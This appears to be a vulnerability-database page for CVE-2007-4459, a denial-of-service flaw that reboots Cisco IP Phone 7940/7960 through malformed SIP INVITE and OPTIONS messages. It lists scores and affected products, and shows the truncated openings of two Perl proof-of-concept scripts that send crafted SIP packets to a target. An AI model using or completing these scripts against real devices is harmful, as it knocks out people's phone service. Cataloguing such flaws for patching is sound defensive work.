7.1
CVSSv2

CVE-2007-4459

Published: 21/08/2007 Updated: 29/07/2017
CVSS v2 Base Score: 7.1 | Impact Score: 6.9 | Exploitability Score: 8.6
VMScore: 720
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:C

Vulnerability Summary

Cisco IP Phone 7940 and 7960 with P0S3-08-6-00 firmware, and other SIP firmware prior to 8.7(0), allows remote malicious users to cause a denial of service (device reboot) via (1) a certain sequence of 10 invalid SIP INVITE and OPTIONS messages; or (2) a certain invalid SIP INVITE message that contains a remote tag, followed by a certain set of two related SIP OPTIONS messages.

Vulnerable Product Search on Vulmon Subscribe to Product

cisco voip phone cp-7960

cisco voip phone cp-7940 8.6

cisco voip phone cp-7940

cisco voip phone cp-7940 3.0

cisco voip phone cp-7940 3.1

cisco voip phone cp-7940 3.2

Exploits

#!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/20\r\nVia: SIP/20/UDP\t19216812;rport;branch=00\r\nFrom: < ...
#!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst-address> <dst-port> <dst_username> <src-address>" unless ($ARGV[3]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/20\r\nVia: SIP/20/UDP $A ...